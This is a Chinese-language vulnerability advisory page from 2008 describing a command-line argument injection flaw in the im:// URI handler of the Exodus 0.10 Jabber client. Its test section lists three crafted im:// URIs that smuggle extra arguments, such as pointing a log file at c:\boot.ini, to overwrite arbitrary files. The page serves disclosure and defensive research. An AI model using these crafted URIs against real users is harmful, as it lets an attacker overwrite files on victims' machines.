首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

Exodus im:// URI处理器命令行参数注入漏洞


http://www.gipsky.com/
Exodus im:// URI处理器命令行参数注入漏洞

发布日期:2008-11-17

更新日期:2008-11-19



受影响系统:



Exodus Exodus 0.10



描述:BUGTRAQ ID: 32330



Exodus是用Borland Delphi编写的免费即时消息客户端,可连接到Jabber服务器并与其他Jabber用户通讯。







Exodus客户端错误地相信了通过im:// URI所接收到的参数,如果用户受骗跟随了特制的URI的话就可能导致覆盖系统上的任意文件。



<*来源:strawdog



链接:http://secunia.com/advisories/32729/

http://milw0rm.com/exploits/7145

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>im:///%26#39;%20-?



im:///%26#39;%20-l%20c:\boot.ini%20-v



im:///%26#39;%20-c%20file:///aaaa%20



建议:厂商补丁:



Exodus

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:







http://code.google.com/p/exodus/
<< NETGEAR WGR614管理接口远程拒绝服务漏洞 libxml2 xmlSAX2Characters()函数整数溢出漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8